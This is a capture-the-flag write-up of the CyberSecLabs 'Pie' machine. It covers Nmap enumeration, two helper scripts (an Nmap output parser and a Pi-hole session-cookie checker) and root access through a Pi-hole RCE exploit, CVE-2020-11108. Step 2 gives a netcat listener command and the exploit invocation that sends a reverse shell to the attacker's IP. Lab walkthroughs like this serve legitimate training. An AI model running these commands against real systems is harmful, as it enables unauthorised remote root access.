CyberSecLabs - Pie

Software Sinner
4 min read · Sep 19, 2020

This is my 13th write-up and I will be discussing my experience with the machine "Pie" from CyberSecLabs. CyberSecLabs is a great platform for people who are starting out with penetration testing and want to sharpen their skills to take on the OSCP. Pie was fairly easy, but finding a good working exploit was tough and took some trial and error. A vulnerable version of Pi-hole landed me root privileges with a Python exploit I found by googling.

Step 1: Enumeration

I started off with an Nmap scan on this machine to see what ports/versions were exposed, and decided there was no need for a second scan type. It does not hurt to run two different types of Nmap scans, because one scan may give you more than the other. The only time I really run a second scan is when I am not finding anything exploitable in my first results. The scan used default scripts (-sC) and version detection (-sV).

I always read my scan results from top to bottom. There were not a ton of ports listed from this scan, so I dived straight into port 80, because in the majority of challenges port 22 is usually not the way in, at least from what I have noticed. In the real world, always look for ways to exploit each port until you are successful.
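Reading a scan top to bottom is easier when the output is saved in Nmap's grepable format (-oG) and sorted by port. The helper below is an added example, not code from the original write-up: it parses a -oG file, lists the open ports in order, and flags open ports that came back with no version banner, which is the usual reason to go back and run a second scan type. The scan line embedded in it is a constructed sample in the -oG format, not the real output from the Pie machine.

```python
"""Parse nmap grepable (-oG) output and list open ports top to bottom.

Added example, not from the original write-up. SAMPLE_GNMAP is a constructed
sample in nmap's -oG format; the services and versions in it are placeholders,
not the Pie machine's real banners.
"""
import re
from dataclasses import dataclass
from typing import List

# Constructed sample of what `nmap -sC -sV -oG scan.gnmap 172.31.1.26` writes.
# Fields in the Ports column are: port/state/proto/owner/service/rpcinfo/version
SAMPLE_GNMAP = """\
# Nmap 7.80 scan initiated as: nmap -sC -sV -oG scan.gnmap 172.31.1.26
Host: 172.31.1.26 ()\tStatus: Up
Host: 172.31.1.26 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.6p1/, 80/open/tcp//http//lighttpd 1.4.45/, 53/open/tcp//domain///, 443/closed/tcp//https///\tIgnored State: filtered (996)
# Nmap done -- 1 IP address (1 host up) scanned
"""

PORTS_LINE = re.compile(r"Host:\s+(\S+)\s+\(.*?\)\s+Ports:\s+(.*?)(?:\t|$)")


@dataclass
class PortEntry:
    host: str
    port: int
    proto: str
    state: str
    service: str
    version: str


def parse_gnmap(text: str) -> List[PortEntry]:
    """Return every port entry found in -oG output, sorted by port number."""
    entries = []
    for line in text.splitlines():
        m = PORTS_LINE.match(line)
        if not m:
            continue  # comment lines and the "Status: Up" line carry no ports
        host, ports_field = m.groups()
        for chunk in ports_field.split(", "):
            fields = chunk.strip().split("/")
            if len(fields) < 7:
                continue  # malformed chunk; nmap always emits seven fields
            port, state, proto, _owner, service, _rpc, version = fields[:7]
            entries.append(PortEntry(host, int(port), proto, state, service, version))
    return sorted(entries, key=lambda e: e.port)


def open_ports(entries: List[PortEntry]) -> List[PortEntry]:
    """Only the ports nmap reported as open."""
    return [e for e in entries if e.state == "open"]


def needs_second_scan(entries: List[PortEntry]) -> List[int]:
    """Open ports with no version banner: candidates for a second scan type."""
    return [e.port for e in open_ports(entries) if not e.version]


def summarize(text: str) -> List[str]:
    """One line per open port, in the order you would read them top to bottom."""
    return [
        f"{e.port}/{e.proto} {e.service or '?'} {e.version or '(no version)'}"
        for e in open_ports(parse_gnmap(text))
    ]


if __name__ == "__main__":
    for line in summarize(SAMPLE_GNMAP):
        print(line)
    missing = needs_second_scan(parse_gnmap(SAMPLE_GNMAP))
    if missing:
        print("no version info on ports", missing, "- consider a second scan")
```

Point it at a real file with `summarize(open("scan.gnmap").read())`; the version column is where you look for the "version" keyword mentioned below before you ever open a browser.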

To check out port 80 from your scan results you just visit the IP in a browser; in this case I typed in http://172.31.1.26 and was presented with a Pi-hole landing page. Sure enough, when looking around I saw a link that brought me to the admin panel.

It is also authenticated, so this is pretty gold. At this step I like to look around for any version information to find available exploits. You can usually view the page source and search for the keyword "version".

Step 2: Exploitation

These exploits had me running around in circles, but after several Google attempts I found an exploit that landed me straight into root.

From looking at the exploit, it seems that the /admin/settings.php?tab=blocklists path is vulnerable to RCE. This is an authenticated bug, so when running the script you need to supply a valid session cookie (the PHPSESSID cookie the Pi-hole admin panel sets once you are logged in). You can grab it from your browser's developer tools under the storage tab, but I went with my favorite Firefox extension, Cookie Manager.
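A stale or mis-copied cookie is the most common reason an exploit like this silently fails, so it is worth checking the session before you run it. The script below is an added example, not part of the original write-up or of the exploit: it normalises whatever you pasted from the cookie manager (bare value or a full "PHPSESSID=..." pair), fetches the blocklists tab with that cookie, and reports whether the admin page or the login form came back. It assumes the session lives in a PHPSESSID cookie and that the login page is the only one carrying a password input; the two HTML snippets are constructed samples, not captured from the Pie machine.

```python
"""Check that a Pi-hole admin session cookie is still valid before feeding it
to an exploit script.

Added example, not from the original write-up. Assumptions (not stated on the
page): the admin panel keeps its session in a PHPSESSID cookie, and an
unauthenticated request is answered with (or redirected to) a login form that
contains a password input.
"""
import re
import sys
import urllib.error
import urllib.request

# Constructed samples of the two kinds of response; not captured from the box.
SAMPLE_LOGIN_PAGE = (
    '<form method="post" action="index.php">'
    '<input type="password" name="pw" id="loginpw" placeholder="Password">'
    '<button type="submit">Log in</button></form>'
)
SAMPLE_BLOCKLISTS_PAGE = (
    '<h1>Settings</h1><div id="blocklists">'
    '<textarea name="adlists">https://example.invalid/hosts.txt</textarea>'
    '</div>'
)

PASSWORD_INPUT = re.compile(r'<input[^>]*type\s*=\s*["\']password["\']', re.IGNORECASE)
# Assumption: PHP session ids are [0-9A-Za-z,-]; the length bounds are generous.
COOKIE_VALUE = re.compile(r"^[0-9A-Za-z,-]{16,128}$")


def normalize_cookie(raw: str) -> str:
    """Accept either the bare value or a full 'PHPSESSID=...; path=/' string (as
    copied from devtools or a cookie-manager extension) and return just the value."""
    value = raw.strip().split(";")[0].strip()  # drop path/expiry attributes
    if "=" in value:
        name, _, value = value.partition("=")
        if name.strip() != "PHPSESSID":
            raise ValueError(f"expected a PHPSESSID cookie, got {name.strip()!r}")
        value = value.strip()
    if not COOKIE_VALUE.fullmatch(value):
        raise ValueError("session id does not look like a PHP session id")
    return value


def looks_authenticated(html: str) -> bool:
    """True when the response is not the login form (no password input)."""
    return PASSWORD_INPUT.search(html) is None


def check_session(base_url: str, cookie: str, timeout: float = 5.0) -> bool:
    """Fetch the blocklists tab with the cookie; True if the admin page came back.
    Redirects to the login page are followed by urllib, so they end up as False."""
    url = base_url.rstrip("/") + "/admin/settings.php?tab=blocklists"
    headers = {"Cookie": f"PHPSESSID={normalize_cookie(cookie)}"}
    req = urllib.request.Request(url, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", errors="replace")
    except urllib.error.HTTPError:
        return False  # 401/403 and friends: definitely not a usable session
    return looks_authenticated(body)


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit(f"usage: {sys.argv[0]} http://172.31.1.26 <session cookie>")
    ok = check_session(sys.argv[1], sys.argv[2])
    print("session valid" if ok else "session NOT valid: log in again and re-copy the cookie")
    sys.exit(0 if ok else 1)
```

Run it as `python3 check_session.py http://172.31.1.26 <your cookie here>` right before the exploit; a non-zero exit means the cookie has expired or was copied with the wrong name, and the exploit script would have failed on the same request.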

Now, back to the exploit. Once you have the session cookie, there are a couple of steps to get this exploit working.

First, set up a Netcat listener on your machine to catch the connection when running the script (sudo is only needed for ports below 1024, so it is optional for 4444, but it does no harm).

On your machine:

sudo nc -lvp 4444

Then in another terminal window run:

sudo python3 root-cve-2020-11108-rce.py <your cookie here> http://172.31.1.26 <your ip here> 4444

After replacing the placeholders in the command above with your IP and session cookie, you should now have a root shell :)

root is so tasty
